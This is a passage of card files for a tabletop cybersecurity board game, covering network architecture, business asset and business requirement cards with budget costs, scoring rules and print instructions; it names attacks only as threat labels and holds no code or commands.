  2. Color-code by OSI layer:
  3. Red (Layer 3-4, Network): SEC-01, SEC-02, SEC-03, SEC-08, SEC-10
  4. Orange (Layer 7, Application): SEC-07
  5. Yellow (Specialized): SEC-04, SEC-05, SEC-06
  6. Blue (Central): SEC-09
  7. Cut along dotted lines
  8. Create a "Device Reference Card" with costs, network placement, and primary protections for quick lookup during gameplay

Network Building Module: Security Device Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

cards/network-building/core-deck/architecture-cards.md

Network Building Module: Architecture Cards

Version: 2.2 - Playtest Edition Last Updated: July 2026


Overview

Architecture Cards represent different network topology and design patterns. Each organization selects ONE architecture that determines how network segments are organized and how traffic flows between them.


Architecture Options

ARCH-01: Flat Network (Traditional)

Cost: 0 Budget Complexity: 1/5 (very simple) Security Posture: Low Performance: High (no routing/switching overhead)

Description: All systems connected to same network segment (same subnet, same broadcast domain). No network segmentation—everything can talk to everything. Traditional small office network.

Network Design:

Internet → Firewall → Switch
                      ├─ Email Server
                      ├─ Web Server
                      ├─ Database Server
                      ├─ File Server
                      ├─ Domain Controller
                      └─ User Workstations

Characteristics: - All systems on same IP subnet (e.g., 192.168.1.0/24) - Single broadcast domain - No layer 3 routing between segments - Firewall only at perimeter, not internal

What This Means for Security: - Advantages: Simple to set up and manage, low cost - Disadvantages: Lateral movement is trivial (attacker on user system can reach database server directly) - Implication: If any system is compromised, entire network is at risk

Who Uses This: - Small offices with <50 people - Non-security-sensitive organizations - Organizations where ease of use matters more than security

Defenses Required: - Stronger endpoint protection (must protect each individual system) - User security training (social engineering becomes primary attack vector) - Cannot rely on network-level controls

Against Incident Response Threats: - T-04 (Lateral Movement): Trivially successful (same network) - T-06 (Mimikatz): Once DC is compromised, entire network is accessible - T-11 (Data Exfil): No segmentation to stop data movement


ARCH-02: Segmented 3-Zone (DMZ Model)

Cost: 5 Budget Complexity: 2/5 (simple but requires planning) Security Posture: Medium Performance: Medium (slight routing overhead)

Description: Network divided into three logical zones with firewall rules between them. This is the most common network architecture for medium-sized organizations.

Network Design:

Internet → Firewall → [DMZ Zone] → Firewall → [Internal Zone] → Firewall → [Admin Zone]
             (Perimeter)    ↓                       ↓                      ↓
                        Web Server            File Server            Domain Controller
                        Email Server          User Workstations      Admin Workstations
                                             Database Server         Backup Server

Three Zones:

  1. DMZ (Demilitarized Zone) - Internet-facing systems
  2. Email Server, Web Server
  3. Direct internet access controlled via firewall
  4. If compromised, firewall prevents spread to internal zone

  5. Internal Zone - Business systems

  6. File Server, Database Server, User Workstations
  7. Can reach DMZ for legitimate purposes
  8. Cannot reach Admin Zone

  9. Admin Zone - Administrative access and privileged systems

  10. Domain Controller, Backup Server
  11. Only reachable from specific admin workstations
  12. Contains most sensitive access

Firewall Rules: - Internet → DMZ: Allowed (limited ports) - DMZ → Internal: Blocked (one-way dependency if needed) - Internal → Admin: Blocked (strict isolation) - Admin → Internal: Allowed (admin management of internal systems) - Admin → DMZ: Allowed (admin management of DMZ)

What This Means for Security: - Advantages: Limits lateral movement (attacker on web server can't reach database server directly) - Disadvantages: More complex to design and manage

Who Uses This: - Most medium-sized organizations (50-500 employees) - Organizations with some web/email presence - Organizations that want segmentation without extreme complexity

Against Incident Response Threats: - T-04 (Lateral Movement): Firewall rules block direct SMB access between zones; attacker must find alternate path - T-06 (Mimikatz): DC is in Admin Zone, isolated from compromised internal system - T-11 (Data Exfil): Must exit through firewall, can be monitored


ARCH-03: Fully Isolated (Zero Trust Model)

Cost: 12 Budget Complexity: 4/5 (complex, requires careful design) Security Posture: Very High Performance: Lower (strict controls add latency)

Description: Network divided into many small segments, each with strict firewall rules. No implicit trust based on network location—every connection is verified. Approximates zero-trust architecture.

Network Design:

Internet → Firewall → [DMZ Segment] → Firewall → [Each Server has own segment]
                                                   + User segment
                                                   + Admin segment
                                                   + Development segment
                                                   + Backup segment
                                                   + Legacy segment

Each connection between segments requires explicit allow rule.

Segment Isolation: - Every major system or group gets its own segment - Database server isolated from file server - Email server isolated from web server - User workstations isolated from each other (per-user or small group segments) - Development isolated from production - Admin segment for domain controllers only - Legacy systems isolated from modern systems

Firewall Rules: - Default deny: Any traffic not explicitly allowed is blocked - Explicit allows: Every needed connection has a specific rule - Unidirectional: Rules are directional (client→server, not server→client) - Port specific: Rules specify exact port, not ranges

What This Means for Security: - Advantages: Lateral movement is nearly impossible—even if one system is compromised, firewall blocks reach to others - Disadvantages: Very complex to design, expensive to implement, difficult to troubleshoot when legitimate traffic is blocked

Who Uses This: - Large enterprises with security teams - Organizations with strict compliance requirements (finance, healthcare, government) - Organizations that assume breach and plan accordingly

Against Incident Response Threats: - T-04 (Lateral Movement): Firewall blocks attempt immediately; attacker cannot move - T-06 (Mimikatz): Even with DC credentials, accessing other systems requires approval - T-11 (Data Exfil): Exfil traffic blocked by firewall rules

Governance: Requires change management process for any new firewall rules


ARCH-04: Cloud Hybrid (Mixed On-Premises & Cloud)

Cost: 8 Budget Complexity: 3/5 (cloud adds complexity) Security Posture: Medium-High (cloud provider handles some security) Performance: Medium (internet latency for cloud communication)

Description: Organization has both on-premises infrastructure AND cloud resources. Some applications run on-premises, others run in cloud (AWS, Azure, GCP).

Network Design:

Internet → Firewall → On-Premises Segment
                          ├─ Email Server (on-prem)
                          ├─ File Server (on-prem)
                          ├─ Database Server (on-prem)
                          └─ VPN/Direct Connect → Cloud

                                                 ├─ Web Server (cloud)
                                                 ├─ App Server (cloud)
                                                 ├─ Cloud Storage
                                                 └─ Cloud Database

Connectivity Methods: 1. VPN: Encrypted tunnel over internet (slower, cheaper) 2. Direct Connect: Dedicated network connection (faster, more expensive)

What This Means for Security: - Advantages: Flexibility (use right tool for each workload), scalability - Disadvantages: New attack surface (cloud APIs, IAM), credential management across platforms

Cloud-Specific Risks: - Misconfigured S3 buckets (public read access) - Cloud IAM overly permissive (too much access) - Cloud API keys in source code - Data residency in unexpected regions

Who Uses This: - Organizations transitioning to cloud (lift-and-shift) - Organizations with variable load (burst to cloud) - Organizations with development in cloud, production on-prem

Against Incident Response Threats: - T-04 (Lateral Movement): Can pivot from on-prem to cloud via cloud APIs - T-08 (Cloud breach): New threat class specific to cloud - T-13 (Misconfiguration): Cloud-specific attack not in traditional scenarios


ARCH-05: Cloud First (Cloud-Only Infrastructure)

Cost: 6 Budget Complexity: 2/5 (cloud provider manages complexity) Security Posture: Medium (cloud provider security + customer configuration) Performance: Excellent (cloud provider optimization)

Description: All infrastructure is cloud-based. No on-premises data center. Applications, data, and users all in cloud (AWS, Azure, GCP, or SaaS).

Network Design:

Internet → Cloud Edge
            ├─ Web Services (cloud)
            ├─ Application Services (cloud)
            ├─ Database (cloud)
            ├─ Storage (cloud)
            └─ All managed by cloud provider

Deployment Models: 1. IaaS (Infrastructure as a Service): You manage VMs, they manage infrastructure 2. PaaS (Platform as a Service): You manage app, they manage platform 3. SaaS (Software as a Service): Vendor manages everything (Microsoft 365, Salesforce, Slack)

Cloud Provider Responsibilities: - Physical security of data centers - Network infrastructure - Hardware maintenance - Some security controls (network, storage)

Customer Responsibilities: - IAM configuration (who can access what) - Network configuration (security groups, VPCs) - Encryption keys (customer-managed or provider-managed) - Application security

What This Means for Security: - Advantages: Offload infrastructure security to cloud provider, auto-scaling, built-in redundancy - Disadvantages: New threat landscape (cloud-specific attacks, misconfiguration)

Cloud-Specific Risks: - IAM overly permissive (everyone can do everything) - Public buckets/storage (data visible to internet) - Unused resources (exposed services) - Cross-account/cross-tenant misconfiguration - Cloud API abuse (stolen credentials)

Who Uses This: - Startups (no on-prem infrastructure needed) - SaaS vendors (cloud is core offering) - Organizations with distributed teams (no office) - Modern organizations building on cloud-native architecture

Against Incident Response Threats: - T-08 (Cloud-specific): Entirely new threat surface - T-13 (Misconfiguration): Most common cloud vulnerability - T-07 (API abuse): Cloud APIs are attack surface


Architecture Comparison Table

Aspect Flat 3-Zone Fully Isolated Cloud Hybrid Cloud First
Cost (Budget) 0 5 12 8 6
Complexity 1/5 2/5 4/5 3/5 2/5
Lateral Movement Risk Very High Medium Very Low Medium-High Medium
Incident Response Difficulty Very Easy Medium Hard Hard Hard
Operational Overhead Low Medium High High Low (cloud manages)
Best For Tiny orgs Medium orgs Large/sensitive Hybrid migration Cloud-native
Scalability Poor Good Excellent Excellent Excellent
Cloud Integration None None Optional Required Only option

Selection Guidance for Teams

Choose Flat Network (ARCH-01) if:

Choose 3-Zone (ARCH-02) if:

Choose Fully Isolated (ARCH-03) if:

Choose Cloud Hybrid (ARCH-04) if:

Choose Cloud First (ARCH-05) if:


Architecture Impact on Other Modules

Incident Response

Hardening

Disaster Recovery


Gameplay Notes

Budget Impact

Choosing architecture affects remaining budget for servers and security devices: - ARCH-01 (Flat): 0 Budget cost, frees up budget for servers - ARCH-02 (3-Zone): 5 Budget cost, medium budget remaining - ARCH-03 (Fully Isolated): 12 Budget cost, significant budget consumed - ARCH-04 (Cloud Hybrid): 8 Budget cost, cloud connectivity cost - ARCH-05 (Cloud First): 6 Budget cost, low cost (cloud provider manages infrastructure)

Firewall Rule Complexity

Higher security architectures require more firewall rules: - ARCH-01: 0 rules needed (flat network) - ARCH-02: 10-20 rules (3-zone model) - ARCH-03: 50-100+ rules (fully isolated, per-system rules) - ARCH-04: 20-30 rules (cloud connectivity + on-prem) - ARCH-05: 10-15 rules (cloud provider manages most)


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Use distinct coloring by security level:
  3. Red (Low Security): ARCH-01
  4. Yellow (Medium Security): ARCH-02
  5. Green (High Security): ARCH-03
  6. Blue (Cloud Hybrid): ARCH-04
  7. Purple (Cloud First): ARCH-05
  8. Include a visual diagram on each card showing network layout
  9. Cut along dotted lines
  10. Create a decision tree reference card to help teams choose architecture

Decision Tree for Architecture Selection

Does your organization use cloud?
├─ No → Do you have >100 people?
│   ├─ No → Choose ARCH-01 (Flat) or ARCH-02 (3-Zone)
│   └─ Yes → Do you have compliance requirements?
│       ├─ No → Choose ARCH-02 (3-Zone)
│       └─ Yes → Choose ARCH-03 (Fully Isolated)
│
├─ Partially (hybrid) → Choose ARCH-04 (Cloud Hybrid)
│
└─ Yes, entirely cloud → Choose ARCH-05 (Cloud First)

Network Building Module: Architecture Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

cards/network-building/core-deck/asset-cards.md

Network Building Module: Asset Cards

Version: 2.2 - Playtest Edition Last Updated: July 2026


Overview

Asset Cards represent business requirements or critical functions that the network must support. Each asset card describes a business need, and teams must ensure their network design includes appropriate servers/services to satisfy each requirement.


Asset Cards

ASSET-01: Email

Business Function: Internal and external email communication Criticality: High (nearly universal requirement) Impact if Down: Significant (communication stops, customer requests missed) Compliance Requirements: Email retention (SOX, GDPR), encryption (HIPAA, PCI-DSS)

Description: Organization needs reliable email system for internal communication and external customer contact. Email is both critical infrastructure and significant security risk (phishing, credential attacks, data exfiltration).

Network Requirements: - Server: Email Server (SRV-01) - Protection: Email Gateway (SEC-06) for phishing/malware filtering - Optional: Load Balancer if email server needs redundancy

Security Considerations: - Email is primary phishing attack vector (T-01 in Incident Response) - Email contains sensitive information (must be encrypted and access-controlled) - Email forwarding rules can be abused for data exfiltration - Email archive must be protected and retained per compliance requirements

Dependencies: - Requires Domain Controller for user authentication - Requires backup for email archive recovery - Integrates with SIEM for email security event logging

Team Design Validation:Must Include: Email Server or equivalent email service (cloud-based OK) ✓ Should Include: Email Gateway for threat filtering ✗ Failure Condition: No email capability = cannot satisfy Asset requirement


ASSET-02: Web

Business Function: Public-facing web application or website Criticality: Medium (business depends on it but alternatives exist) Impact if Down: Moderate (customers cannot access services, lost sales/engagement) Compliance Requirements: PCI-DSS (if payments), WCAG accessibility

Description: Organization has public web presence—either corporate website, e-commerce site, or customer portal. Web server is exposed to internet and primary target for web exploits (SQL injection, RCE, DDoS).

Network Requirements: - Server: Web Server (SRV-02) in DMZ - Protection: WAF (SEC-07) for application-layer attack prevention - Optional: Load Balancer (SEC-04) for redundancy and DDoS protection

Security Considerations: - Web servers have highest internet attack surface - Vulnerable to web exploits (T-02 Watering Hole, T-05 Kernel Exploit in Incident Response) - DDoS attacks can take down web server - Code injection can compromise entire application - Requires patching and web application security testing

Dependencies: - Often connects to Database (for dynamic content) - May require load balancer for redundancy - Requires SIEM monitoring for web security events

Team Design Validation:Must Include: Web Server (SRV-02) or cloud-hosted web service ✓ Should Include: WAF for attack protection ✓ Should Include: Load Balancer if redundancy needed ✗ Failure Condition: No web server = Asset unsatisfied


ASSET-03: Database

Business Function: Data storage and retrieval for critical business data Criticality: Very High (most sensitive business data) Impact if Down: Severe (business cannot operate, financial/customer impact) Compliance Requirements: PCI-DSS, HIPAA, GDPR, SOX (depending on data type)

Description: Centralized database for customer data, financial records, operational data. Database is most valuable attack target—contains the "crown jewels." Database compromise often defines loss condition in Incident Response.

Network Requirements: - Server: Database Server (SRV-03) in restricted/admin segment - Protection: Network Segmentation (SEC-08) to limit access - Optional: Backup Server (SRV-07) for recovery capability

Security Considerations: - Database is primary exfiltration target (T-10, T-11 in Incident Response) - SQL injection attacks compromise database - Credential abuse allows unauthorized access to sensitive data - Data exfiltration is often attack goal (customer PII, financial data) - Database compromise may be game-loss condition - Must have immutable backups for recovery from ransomware

Dependencies: - Requires strong authentication (MFA, password vault) - Requires Data Loss Prevention (DLP) to prevent exfiltration - Requires encryption at rest and in transit - Requires database activity monitoring (DAM) for audit

Team Design Validation:Must Include: Database Server or equivalent data store (Cloud Workload hosting is allowed but is a recorded risk) ✓ Should Include: Network Segmentation to isolate database access ✓ Should Include: Backup Server for disaster recovery ✗ Failure Condition: No database = Asset unsatisfied OR unsecured database access = audit finding


ASSET-04: File Storage

Business Function: Shared file storage for documents, projects, compliance records Criticality: High (business relies on shared documents) Impact if Down: Moderate-High (work stops, cannot access needed files) Compliance Requirements: Data retention (GDPR), data classification (HIPAA, PCI-DSS)

Description: Shared network file storage for collaborative work. File servers often contain mixed-sensitivity data (company policy next to customer PII next to trade secrets). Poorly secured file storage is source of data exfiltration and lateral movement.

Network Requirements: - Server: File Server (SRV-04) in protected segment - Protection: Network Segmentation (SEC-08) to limit file access - Optional: DLP (in Hardening module) to prevent sensitive file exfiltration

Security Considerations: - File servers are lateral movement target (T-04 in Incident Response) - SMB protocol allows attacker to enumerate shares and attempt access - Over-permissive file permissions = data exfiltration vector - Ransomware frequently targets file servers (T-11 in Incident Response) - File permissions audit is critical for compliance

Dependencies: - Requires Domain Controller for user authentication - Requires Network Segmentation to limit SMB access - Requires backup strategy (especially for ransomware recovery) - Requires file permission auditing

Team Design Validation:Must Include: File Server or cloud file storage (OneDrive, SharePoint, Google Drive) ✓ Should Include: Network Segmentation to restrict access ✓ Should Include: Backup for ransomware recovery ✗ Failure Condition: No file storage = Asset unsatisfied


ASSET-05: Identity

Business Function: User identity and access management Criticality: Very High (foundational to all access control) Impact if Down: Severe (cannot authenticate users, cannot operate) Compliance Requirements: MFA (various standards), audit logging (GDPR, SOX)

Description: Centralized identity system (Active Directory, Azure AD, Okta) that authenticates users and grants access to resources. Identity compromise is game-over scenario—attacker with access to identity system can impersonate any user.

Network Requirements: - Server: Domain Controller (SRV-05) in admin segment - Protection: Network Segmentation Switch (SEC-08) — keep the DC in an isolated admin zone - Optional: Second Domain Controller for redundancy (full price)

Security Considerations: - Domain Controller is most sensitive system (compromise = total infrastructure access) - Credential dumping attacks target DC (T-06 Mimikatz in Incident Response) - Compromised DC allows attacker to create backdoor accounts - Pass-the-hash attacks replay credentials from DC compromise - DC must be in isolated segment with strict access control

Dependencies: - Requires strong authentication (MFA for all DC access) - Requires privileged access workstation (PAW) for admin access - Requires immutable backup DC in separate location - Requires audit logging of all DC changes

Team Design Validation:Must Include: Domain Controller (on-premises or Azure AD) ✓ Should Include: Network Segmentation (isolated admin zone) ✓ Should Include: Second Domain Controller for redundancy (optional, full price) ✗ Failure Condition: No identity system = the Identity requirement is unsatisfied (design incomplete)


ASSET-06: Development

Business Function: Software development and testing environment Criticality: Medium (important but not production-critical) Requirement Strength: Recommended (v2.2) — may be satisfied by overloading another server (+1 Budget per extra service) Impact if Down: Low-Medium (development delays, but not immediate business impact) Compliance Requirements: Secrets management (API keys not hardcoded), code scanning

Description: Development and testing infrastructure where software developers build and test applications. Development environment is often overlooked security risk because developers prioritize speed over security.

Network Requirements: - Server: Development Server (SRV-06) in isolated development segment - Protection: Firewall rules prevent dev→prod lateral movement - Optional: Code repository (Git, GitHub) for version control

Security Considerations: - Development servers often contain production-like data (compliance violation) - Developers have broad access (weak access controls) - Test credentials and API keys in source code - Outdated/unpatched tools (developer tools not security tools) - Development system as lateral movement springboard to production - Source code repository is high-value target (intellectual property)

Dependencies: - Requires separate database from production (never use production data in dev) - Requires code review and secrets scanning - Requires firewall rules isolating dev from production - Requires MFA for code repository access

Team Design Validation:Should Include: Development Server, OR dev services overloaded onto another server (allowed, +1 Budget) ✓ Should Isolate: Dev network from production network ✓ Should Scan: Code for hardcoded secrets ✗ Failure Condition: Using production database in dev = data exposure/compliance violation


ASSET-07: Disaster Recovery

Business Function: Recovery capability for business continuity Criticality: Very High (determines if business survives major attack/disaster) Requirement Strength: Required (v2.2) Impact if Down: Catastrophic (cannot recover from major incident) Compliance Requirements: Backup retention, recovery SLA (RTO/RPO)

Description: Backup and disaster recovery capability. Organization needs ability to recover from data loss, ransomware, or disaster. Backup/recovery capability is often neglected until it's needed.

Network Requirements: - Server: Backup Server (SRV-07) with off-site backups - Protection: Immutable backups (WORM storage) - 3-2-1 Strategy: 3 copies, 2 media types, 1 off-site

Security Considerations: - Ransomware attacks target backup systems (T-11 in Incident Response) - Backup must be immutable (attacker cannot modify backups) - Backup must be off-site (local backup lost if data center destroyed) - Backup testing must be regular (quarterly minimum) - Backup credentials must be separate from domain (attacker cannot delete backups)

Dependencies: - Requires off-site backup location (geographically separated) - Requires immutable storage (WORM or cloud versioning) - Requires regular backup restore testing - Requires separate backup credentials

Team Design Validation:Must Include: Backup Server with off-site capability ✓ Must Test: Recovery procedures (quarterly) ✓ Must Implement: 3-2-1 strategy ✗ Failure Condition (v2.2): No Backup Server = automatic FAIL on the Disaster Recovery requirement, recorded as a CRITICAL gap (not an instant game loss — but ransomware in later modules becomes unrecoverable)


ASSET-08: VPN/Remote Access

Business Function: Secure remote access for employees and contractors Criticality: Medium (became High during COVID pandemic) Impact if Down: Moderate (remote workers cannot work) Compliance Requirements: MFA (various standards), encryption, audit logging

Description: VPN or similar remote access solution for employees working from home, traveling, or off-site. Remote access expands attack surface but is necessary for modern workforce.

Network Requirements: - Device: VPN Gateway (SEC-05) at network perimeter - Protection: MFA required for all VPN access - Optional: Conditional access policies (restrict access by device/location)

Security Considerations: - VPN is attractive attack target (Credential Abuse) - Weak VPN credentials easily brute-forced (must use MFA) - Compromised home computer connecting via VPN = internal network at risk - VPN traffic must be encrypted - VPN access must be logged and audited

Dependencies: - Requires Domain Controller for user authentication - Requires MFA (cannot rely on password alone) - Requires endpoint security on remote devices - Requires SIEM monitoring of VPN access

Team Design Validation:Should Include: VPN Gateway for remote access ✓ Must Implement: MFA for VPN access ✓ Should Monitor: VPN access logs in SIEM ✗ Failure Condition: Weak VPN security (no MFA) = credential attack vector


Asset Card Summary

Asset Business Function Criticality Server Key Defense
ASSET-01 Email High SRV-01 Email Gateway
ASSET-02 Web Medium SRV-02 WAF
ASSET-03 Database Very High SRV-03 Network Segmentation
ASSET-04 File Storage High SRV-04 Network Segmentation
ASSET-05 Identity Very High SRV-05 Network Segmentation
ASSET-06 Development Medium SRV-06 Network Isolation
ASSET-07 Disaster Recovery Very High SRV-07 Immutable Backups
ASSET-08 VPN/Remote Access Medium SEC-05 MFA

Gameplay Integration

Network Building Module

Asset Cards drive network design decisions: 1. Display all 8 Asset Cards face-up on the table 2. Team designs network to satisfy each Asset 3. For each Asset, team must include appropriate Server and Defenses 4. Team validates: "Does our network design satisfy this Asset?"

Incident Response Module

Asset Cards provide scenario context: - Threat Orchestrator refers to Assets when describing scenarios - "Customer database is being exfiltrated" = reference ASSET-03 - "Email is compromised" = reference ASSET-01 - Assets help Blue Team understand what they're protecting

Disaster Recovery Module

Asset Cards determine impact assessment: - "How many critical systems are down?" = count "Very High" Assets affected - Recovery priority = order by Asset criticality - RTO (Recovery Time Objective) depends on which Assets must recover first


Expansion Notes

Asset Card Variants (for specific industries)

Financial Services Assets: - Trading System (real-time market data) - Payment Processing (external integrations) - Audit Trail (regulatory requirement)

Healthcare Assets: - Electronic Health Records (HIPAA-critical) - Prescription Management (pharmacy integration) - Patient Portal (external access)

Manufacturing Assets: - Industrial Control Systems (safety-critical) - Supply Chain Integration (vendor systems) - Engineering Data (intellectual property)

Retail Assets: - Point of Sale (transaction processing) - Inventory Management (supplier integration) - Customer Loyalty (marketing data)


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Color-code by criticality:
  3. Red (Very High): ASSET-03, ASSET-05, ASSET-07
  4. Orange (High): ASSET-01, ASSET-04
  5. Yellow (Medium): ASSET-02, ASSET-06, ASSET-08
  6. Include icons representing each asset:
  7. Email: Envelope icon
  8. Web: Globe icon
  9. Database: Cylinder/drum icon
  10. File: Folder icon
  11. Identity: ID card / Shield icon
  12. Development: Code brackets icon
  13. Disaster Recovery: Backup/Archive icon
  14. VPN: Lock/tunnel icon
  15. Cut along dotted lines
  16. Create a "Business Requirement Validation Card" that teams use to check off satisfied requirements

Team Validation Checklist (v2.2)

After team completes network design, verify each Asset is satisfied. The checklist only names components that can actually be purchased from the Network Building decks; items in parentheses are recommended, not mandatory.

If any Asset is unsatisfied or under-defended: - Network design is incomplete - That Asset becomes a vulnerability in Incident Response - That Asset affects recovery time in Disaster Recovery


Network Building Module: Asset Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

cards/network-building/standalone/business-requirement-cards.md

Network Building Standalone: Business Requirement Cards

Version: 2.2 - Playtest Edition Last Updated: July 2026


Overview

Business Requirement Cards drive the Network Building standalone game. One card is revealed at the start of each turn (Phase 1) and represents what the business demands this quarter. Teams must satisfy the requirement by end of the stated deadline or take the score penalty.


Business Requirement Cards

REQ-01: New Product Launch Website

Type: Growth Requirement: Marketing is launching a flagship product this quarter and needs a modern public website. Satisfied By: Web Server (7), OR web service hosted on a Cloud Workload (4) Score Impact: Missed: -5 points (launch flops; lost sales)


REQ-02: Customer Data Acquisition

Type: Growth / M&A Requirement: The executive team is acquiring a customer-data company. Two million customer records must land somewhere safe by end of quarter. Satisfied By: Database Server (10), OR database service hosted on a Cloud Workload (4) — cloud-hosting the crown jewels is a recorded risk Score Impact: Missed: -10 points (deal falls through)


REQ-03: Work-From-Home Program

Type: Workforce Requirement: HR is rolling out flexible work. Staff need secure remote access to internal systems. Satisfied By: VPN Gateway (9) Score Impact: Missed: -3 points (staff use risky workarounds; morale dips)


REQ-04: Remote Workforce Mandate

Type: Workforce Requirement: The board mandates support for a fully remote workforce: secure access AND central identity for every remote login. Satisfied By: VPN Gateway (9) AND Domain Controller (12) Score Impact: Missed: -5 points (shadow IT spreads across home offices)


REQ-05: HIPAA Compliance Mandate

Type: Compliance Requirement: A new healthcare client puts you in HIPAA scope. Regulators expect recoverable data and isolated sensitive systems. Satisfied By: Backup Server (9) AND network segmentation (Network Segmentation Switch (10), or Segmented/Fully Isolated architecture) Score Impact: Missed: -10 points (client walks; compliance exposure)


REQ-06: PCI Scope: Cardholder Data

Type: Compliance Requirement: You now process card payments. Cardholder data must live on a database that is walled off from the rest of the network. Satisfied By: Database Server (10) or cloud-hosted database, AND a Firewall (12) or Network Segmentation Switch (10) protecting it Score Impact: Missed: -10 points (acquirer threatens to pull card processing)


REQ-07: 99.9% Uptime SLA

Type: Operations Requirement: Your biggest customer signs a contract with a 99.9% uptime SLA on your public services. A single box is no longer good enough. Satisfied By: Load Balancer (8), OR a second server duplicating any business-critical service (full price) Score Impact: Missed: -5 points (SLA credits eat the margin)


REQ-08: M&A: Integrate Acquired Network

Type: Growth / M&A Requirement: The company you just bought needs its two core services absorbed into your infrastructure this quarter. Satisfied By: Two free capacity slots across your existing servers, OR deploy any new server this turn to host them (overloading is allowed at +1 Budget per extra service) Score Impact: Missed: -10 points (integration stalls; synergies evaporate)


REQ-09: Scale Email System

Type: Operations Requirement: Headcount doubled and the email system is groaning. Add headroom. Satisfied By: Second Email Server (8), Load Balancer (8), OR email hosted on a Cloud Workload (4) Score Impact: Missed: -5 points (mail delays; missed customer requests)


REQ-10: Security Audit Ordered

Type: Compliance Requirement: The audit committee orders an independent security audit. Auditors expect centralized visibility of security events. Satisfied By: SIEM (15), OR both IDS (10) and Email Gateway (6) Score Impact: Missed: -5 points (qualified audit opinion)


REQ-11: Board Demands IR Readiness

Type: Security Requirement: A competitor's breach is front-page news. The board demands demonstrable incident-detection capability. Satisfied By: IDS (10), IPS (14), OR SIEM (15) Score Impact: Missed: -10 points (board censure; CISO on thin ice)


REQ-12: Ransomware Wave in Sector

Type: Security Requirement: A ransomware variant is tearing through your industry. You need recoverable backups AND a way to spot the attack. Satisfied By: Backup Server (9) AND at least one of IDS (10) / IPS (14) / SIEM (15) Score Impact: Missed: -20 points (you are one bad click from catastrophe)


REQ-13: New Subsidiary Office

Type: Growth Requirement: A new regional office opens with no local infrastructure. Staff there must reach head-office systems securely. Satisfied By: VPN Gateway (9) Score Impact: Missed: -5 points (office runs on personal email and USB sticks)


REQ-14: E-Commerce Expansion

Type: Growth Requirement: Sales moves online. You need a public web presence AND protection against the web attacks that come with taking payments. Satisfied By: Web Server (7) or cloud-hosted web, AND WAF (11) Score Impact: Missed: -5 points (checkout is either absent or a breach waiting to happen)


REQ-15: Developer Hiring Spree

Type: Workforce Requirement: Engineering triples in size. Developers need somewhere to build and test that is not production. Satisfied By: Development Server (5), OR dev services overloaded onto an existing server (+1 Budget per extra service — allowed) Score Impact: Missed: -3 points (developers test in production; incidents follow)


REQ-16: Records-Retention Regulation

Type: Compliance Requirement: New regulation requires seven-year retention of business records: durable shared storage plus a recoverable copy. Satisfied By: File storage (File Server (6), or hosted on another server's capacity/overload) AND Backup Server (9) Score Impact: Missed: -5 points (regulator issues a compliance notice)


REQ-17: Single Sign-On Rollout

Type: Operations Requirement: Password chaos across a dozen apps. Leadership wants one identity for everything. Satisfied By: Domain Controller (12) Score Impact: Missed: -5 points (password reuse everywhere; helpdesk drowning)


REQ-18: Cyber-Insurance Renewal

Type: Security Requirement: Your insurer's renewal questionnaire wants proof of backups, phishing defense, and detection. Satisfied By: Backup Server (9) AND Email Gateway (6) AND at least one of IDS/IPS/SIEM Score Impact: Met: +5 points (premium drops). Missed: -5 points (premium spikes)


REQ-19: Threat-Intel Pilot

Type: Security (Opportunity) Requirement: Your ISAC offers to feature any member running deception technology in its quarterly report. Satisfied By: Honeypot Decoy (7) or Honeypot Network (8) Score Impact: Met: +5 points (industry kudos). Missed: 0 points (opportunity passes; no penalty)


REQ-20: Data-Center Consolidation

Type: Operations (Opportunity) Requirement: Finance wants the server-room footprint shrunk. Show that at least one business service runs in the cloud. Satisfied By: Any service hosted on a Cloud Workload (4) Score Impact: Met: +3 points (opex savings). Missed: -3 points (facilities costs balloon)


Requirement Card Summary

Card Requirement Satisfied By Missed Met Bonus
REQ-01 Product Launch Website Web Server or cloud web -5
REQ-02 Customer Data Acquisition Database (dedicated or cloud) -10
REQ-03 Work-From-Home Program VPN Gateway -3
REQ-04 Remote Workforce Mandate VPN Gateway + Domain Controller -5
REQ-05 HIPAA Compliance Backup + segmentation -10
REQ-06 PCI Cardholder Data Database + Firewall/Segmentation -10
REQ-07 99.9% Uptime SLA Load Balancer or duplicate server -5
REQ-08 M&A Network Integration 2 spare slots or new server -10
REQ-09 Scale Email System 2nd Email Server / LB / cloud email -5
REQ-10 Security Audit SIEM, or IDS + Email Gateway -5
REQ-11 IR Readiness IDS, IPS, or SIEM -10
REQ-12 Ransomware Wave Backup + detection -20
REQ-13 New Subsidiary Office VPN Gateway -5
REQ-14 E-Commerce Expansion Web + WAF -5
REQ-15 Developer Hiring Spree Dev Server or overload -3
REQ-16 Records Retention File storage + Backup -5
REQ-17 Single Sign-On Domain Controller -5
REQ-18 Cyber-Insurance Renewal Backup + Email Gateway + detection -5 +5
REQ-19 Threat-Intel Pilot Honeypot 0 +5
REQ-20 Data-Center Consolidation Any cloud-hosted service -3 +3

Gameplay Notes

Draw Rules

Design Tension

Requirements are deliberately lumpy: some are satisfied by things every sane design already has (web, database), others punish narrow builds (detection, deception, redundancy). Teams that spend everything in turn 1 have no reserve when REQ-12 lands.


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Color-code by type:
  3. Green (Growth/M&A): REQ-01, REQ-02, REQ-08, REQ-13, REQ-14
  4. Blue (Workforce/Operations): REQ-03, REQ-04, REQ-07, REQ-09, REQ-15, REQ-17, REQ-20
  5. Orange (Compliance): REQ-05, REQ-06, REQ-10, REQ-16
  6. Red (Security): REQ-11, REQ-12, REQ-18, REQ-19
  7. Cut along dotted lines
  8. Shuffle into a single face-down deck for play

Network Building Standalone: Business Requirement Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

cards/network-building/standalone/operational-event-cards.md

Network Building Standalone: Operational Event Cards

Version: 2.2 - Playtest Edition Last Updated: July 2026


Overview

Operational Event Cards are the random incidents, windfalls, and headaches of running infrastructure. One card is revealed each turn (Phase 2) of the Network Building standalone game, right after the Business Requirement.


Operational Event Cards

EVT-01: Email Server Failure

